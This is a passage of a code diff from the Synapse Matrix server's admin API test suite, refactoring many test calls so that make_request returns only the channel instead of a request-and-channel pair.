+198,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"POST\", self.url, b\"{}\")", - "+ channel = self.make_request(\"POST\", self.url, b\"{}\")", - "@@ -218,3 +210,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", self.url, access_token=self.other_user_token,", - "@@ -231,3 +223,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", url + \"?before_ts=1234\", access_token=self.admin_user_tok,", - "@@ -242,5 +234,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(", - "- \"POST\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"POST\", self.url, access_token=self.admin_user_tok,)", - "@@ -256,3 +246,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", self.url + \"?before_ts=-1234\", access_token=self.admin_user_tok,", - "@@ -267,3 +257,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -280,3 +270,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -310,3 +300,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - " now_ms = self.clock.time_msec()", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -334,3 +324,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -346,3 +336,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - " now_ms = self.clock.time_msec()", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -369,3 +359,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - " now_ms = self.clock.time_msec()", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -380,3 +370,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - " now_ms = self.clock.time_msec()", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -403,3 +393,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - " # set media as avatar", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -412,3 +402,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - " now_ms = self.clock.time_msec()", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -423,3 +413,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - " now_ms = self.clock.time_msec()", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -447,3 +437,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - " room_id = self.helper.create_room_as(self.admin_user, tok=self.admin_user_tok)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -456,3 +446,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - " now_ms = self.clock.time_msec()", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -467,3 +457,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - " now_ms = self.clock.time_msec()", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -514,3 +504,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "diff --git a/tests/rest/admin/test_room.py b/tests/rest/admin/test_room.py", - "index 9c100050d..ca20bcad0 100644", - "--- a/tests/rest/admin/test_room.py", - "+++ b/tests/rest/admin/test_room.py", - "@@ -81,3 +81,3 @@ class ShutdownRoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/shutdown_room/\" + room_id", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -105,3 +105,3 @@ class ShutdownRoomTestCase(unittest.HomeserverTestCase):", - " url = \"rooms/%s/state/m.room.history_visibility\" % (room_id,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -115,3 +115,3 @@ class ShutdownRoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/shutdown_room/\" + room_id", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -132,3 +132,3 @@ class ShutdownRoomTestCase(unittest.HomeserverTestCase):", - " url = \"rooms/%s/initialSync\" % (room_id,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok", - "@@ -140,3 +140,3 @@ class ShutdownRoomTestCase(unittest.HomeserverTestCase):", - " url = \"events?timeout=0&room_id=\" + room_id", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok", - "@@ -186,3 +186,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", self.url, json.dumps({}), access_token=self.other_user_tok,", - "@@ -199,3 +199,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", url, json.dumps({}), access_token=self.admin_user_tok,", - "@@ -212,3 +212,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", url, json.dumps({}), access_token=self.admin_user_tok,", - "@@ -227,3 +227,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -246,3 +246,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -264,3 +264,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -280,3 +280,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -306,3 +306,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -339,3 +339,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -373,3 +373,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -420,3 +420,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/rooms/%s/delete\" % self.room_id", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -450,3 +450,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - " url = \"rooms/%s/state/m.room.history_visibility\" % (self.room_id,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -467,3 +467,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/rooms/%s/delete\" % self.room_id", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -532,3 +532,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - " url = \"rooms/%s/initialSync\" % (room_id,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok", - "@@ -540,3 +540,3 @@ class DeleteRoomTestCase(unittest.HomeserverTestCase):", - " url = \"events?timeout=0&room_id=\" + room_id", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok", - "@@ -571,3 +571,3 @@ class PurgeRoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/purge_room\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -625,3 +625,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/rooms\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "@@ -706,3 +706,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "@@ -746,3 +746,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/rooms?from=%d&limit=%d\" % (start, limit)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "@@ -766,3 +766,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_matrix/client/r0/directory/room/%s\" % (urllib.parse.quote(test_alias),)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -796,3 +796,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/rooms\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "@@ -837,3 +837,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -877,3 +877,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " url += \"&dir=b\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "@@ -1013,3 +1013,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/rooms?search_term=%s\" % (search_term,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "@@ -1074,3 +1074,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/rooms/%s\" % (room_id_1,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "@@ -1104,3 +1104,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/rooms/%s\" % (room_id_1,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "@@ -1116,3 +1116,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/rooms/%s\" % (room_id_1,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "@@ -1126,3 +1126,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/rooms/%s\" % (room_id_1,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "@@ -1155,3 +1155,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/rooms/%s/members\" % (room_id_1,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "@@ -1166,3 +1166,3 @@ class RoomTestCase(unittest.HomeserverTestCase):", - " url = \"/_synapse/admin/v1/rooms/%s/members\" % (room_id_2,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "@@ -1206,3 +1206,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1222,3 +1222,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1238,3 +1238,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1254,3 +1254,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1274,3 +1274,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1291,3 +1291,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1310,3 +1310,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1322,3 +1322,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/_matrix/client/r0/joined_rooms\", access_token=self.second_tok,", - "@@ -1339,3 +1339,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1369,3 +1369,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/_matrix/client/r0/joined_rooms\", access_token=self.admin_user_tok,", - "@@ -1380,3 +1380,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1391,3 +1391,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/_matrix/client/r0/joined_rooms\", access_token=self.second_tok,", - "@@ -1408,3 +1408,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1420,3 +1420,3 @@ class JoinAliasRoomTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/_matrix/client/r0/joined_rooms\", access_token=self.second_tok,", - "diff --git a/tests/rest/admin/test_statistics.py b/tests/rest/admin/test_statistics.py", - "index 907b49f88..73f8a8ec9 100644", - "--- a/tests/rest/admin/test_statistics.py", - "+++ b/tests/rest/admin/test_statistics.py", - "@@ -48,3 +48,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", - "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", - "@@ -57,3 +57,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url, json.dumps({}), access_token=self.other_user_tok,", - "@@ -69,3 +69,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # unkown order_by", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?order_by=bar\", access_token=self.admin_user_tok,", - "@@ -77,3 +77,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # negative from", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?from=-5\", access_token=self.admin_user_tok,", - "@@ -85,3 +85,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # negative limit", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=-5\", access_token=self.admin_user_tok,", - "@@ -93,3 +93,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # negative from_ts", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?from_ts=-1234\", access_token=self.admin_user_tok,", - "@@ -101,3 +101,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # negative until_ts", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?until_ts=-1234\", access_token=self.admin_user_tok,", - "@@ -109,3 +109,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # until_ts smaller from_ts", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -119,3 +119,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # empty search term", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?search_term=\", access_token=self.admin_user_tok,", - "@@ -127,3 +127,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # invalid search order", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?dir=bar\", access_token=self.admin_user_tok,", - "@@ -140,3 +140,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=5\", access_token=self.admin_user_tok,", - "@@ -156,3 +156,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?from=5\", access_token=self.admin_user_tok,", - "@@ -172,3 +172,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?from=5&limit=10\", access_token=self.admin_user_tok,", - "@@ -192,3 +192,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # Number of results is the number of entries", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=20\", access_token=self.admin_user_tok,", - "@@ -203,3 +203,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # Number of max results is larger than the number of entries", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=21\", access_token=self.admin_user_tok,", - "@@ -214,3 +214,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # Number of max results is smaller than the number of entries", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?limit=19\", access_token=self.admin_user_tok,", - "@@ -225,3 +225,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # Check `next_token` does not appear", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?from=19\", access_token=self.admin_user_tok,", - "@@ -240,5 +240,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - "@@ -318,5 +316,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # list all media when filter is not set", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -326,3 +322,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # result is 0", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?from_ts=%s\" % (ts1,), access_token=self.admin_user_tok,", - "@@ -339,3 +335,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # filter media between `ts1` and `ts2`", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -348,3 +344,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # filter media until `ts2` and earlier", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?until_ts=%s\" % (ts2,), access_token=self.admin_user_tok,", - "@@ -358,5 +354,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # check without filter get all users", - "- request, channel = self.make_request(", - "- \"GET\", self.url, access_token=self.admin_user_tok,", - "- )", - "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", - " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -365,3 +359,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # filter user 1 and 10-19 by `user_id`", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -374,3 +368,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # filter on this user in `displayname`", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -384,3 +378,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " # filter and get empty result", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url + \"?search_term=foobar\", access_token=self.admin_user_tok,", - "@@ -449,3 +443,3 @@ class UserMediaStatisticsTestCase(unittest.HomeserverTestCase):", - " url += \"&dir=%s\" % (dir,)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok,", - "diff --git a/tests/rest/admin/test_user.py b/tests/rest/admin/test_user.py", - "index ba1438cdc..582f98322 100644", - "--- a/tests/rest/admin/test_user.py", - "+++ b/tests/rest/admin/test_user.py", - "@@ -72,3 +72,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"POST\", self.url, b\"{}\")", - "+ channel = self.make_request(\"POST\", self.url, b\"{}\")", - "@@ -89,3 +89,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"GET\", self.url)", - "+ channel = self.make_request(\"GET\", self.url)", - "@@ -98,3 +98,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"GET\", self.url)", - "+ channel = self.make_request(\"GET\", self.url)", - " nonce = channel.json_body[\"nonce\"]", - "@@ -105,3 +105,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " body = json.dumps({\"nonce\": nonce})", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -113,3 +113,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -122,3 +122,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"GET\", self.url)", - "+ channel = self.make_request(\"GET\", self.url)", - " nonce = channel.json_body[\"nonce\"]", - "@@ -138,3 +138,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -148,3 +148,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"GET\", self.url)", - "+ channel = self.make_request(\"GET\", self.url)", - " nonce = channel.json_body[\"nonce\"]", - "@@ -167,3 +167,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -176,3 +176,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " \"\"\"", - "- request, channel = self.make_request(\"GET\", self.url)", - "+ channel = self.make_request(\"GET\", self.url)", - " nonce = channel.json_body[\"nonce\"]", - "@@ -192,3 +192,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -198,3 +198,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " # Now, try and reuse it", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -211,3 +211,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " def nonce():", - "- request, channel = self.make_request(\"GET\", self.url)", - "+ channel = self.make_request(\"GET\", self.url)", - " return channel.json_body[\"nonce\"]", - "@@ -220,3 +220,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " body = json.dumps({})", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -231,3 +231,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " body = json.dumps({\"nonce\": nonce()})", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -238,3 +238,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " body = json.dumps({\"nonce\": nonce(), \"username\": 1234})", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -245,3 +245,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " body = json.dumps({\"nonce\": nonce(), \"username\": \"abcd\\u0000\"})", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -252,3 +252,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " body = json.dumps({\"nonce\": nonce(), \"username\": \"a\" * 1000})", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -263,3 +263,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " body = json.dumps({\"nonce\": nonce(), \"username\": \"a\"})", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -270,3 +270,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " body = json.dumps({\"nonce\": nonce(), \"username\": \"a\", \"password\": 1234})", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -277,3 +277,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " body = json.dumps({\"nonce\": nonce(), \"username\": \"a\", \"password\": \"abcd\\u0000\"})", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -284,3 +284,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " body = json.dumps({\"nonce\": nonce(), \"username\": \"a\", \"password\": \"A\" * 1000})", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -302,3 +302,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -313,3 +313,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " # set no displayname", - "- request, channel = self.make_request(\"GET\", self.url)", - "+ channel = self.make_request(\"GET\", self.url)", - " nonce = channel.json_body[\"nonce\"]", - "@@ -323,3 +323,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "+ channel = self.make_request(\"POST\", self.url, body.encode(\"utf8\"))", - "@@ -328,3 +328,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"GET\", \"/profile/@bob1:test/displayname\")", - "+ channel = self.make_request(\"GET\", \"/profile/@bob1:test/displayname\")", - " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "@@ -333,3 +333,3 @@ class UserRegisterTestCase(unittest.HomeserverTestCase):", - " # displayname is None", - "- request, channel = self.make_request(\"GET\", self.url)", - "+ channel = self.make_request(\"GET\", self.url)", - " nonce = channel.json_body[\"nonce\"]", - 